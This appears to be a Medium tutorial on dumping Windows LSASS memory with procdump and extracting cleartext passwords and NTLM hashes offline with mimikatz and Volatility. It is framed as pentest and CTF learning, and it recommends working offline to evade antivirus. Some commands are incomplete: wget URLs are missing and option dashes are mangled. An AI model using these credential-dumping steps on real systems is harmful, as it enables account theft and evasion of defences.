using Mimikatz to get cleartext password from offline memory dump

requirements :
new version of kali
mimikatz : wget

in case you found offline dump or you were able to dump lsas process using procdump

The technique can be involves in pentesting by obtaining passwords in clear text from a server without running “malicious” code in it since mimikatz is flagged by most AV . In this way we avoid having to deal with antivirus evasion techniques and other headaches.

On the other hand, Procdump is a tool developed by Mark Russinovich that will allow us to dump the memory space of a process to a file.

Note : To take dump you require system privileges

C:\temp\procdump.exe -accepteula  -ma lsass.exe lsass.dmp
#For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
#For 64 bits

Download the file lsass.dmp generated.
Launch mimikatz alpha against the lsass.dmp file with the commands:

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP

in case of full memory dump you can follow the reference : which i did not try myself but should work in virtualbox :

— — — — — — -

now lets dig into volatility and mimikatz

by default volatility does not have mimikatz so you need to navigate to the directory

  1. /usr/share/volatility
  2. mkdir plugins
  3. cd plugins
  4. wget
  5. apt-get install python-crypto
  6. volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f halomar.dmp mimikatz

this is the memory dump file

if you need the ntlm hash :

volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f ~/Desktop/ctf/halomar.dmp hashdump

That’s it , i did learn something new .. hope you do

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store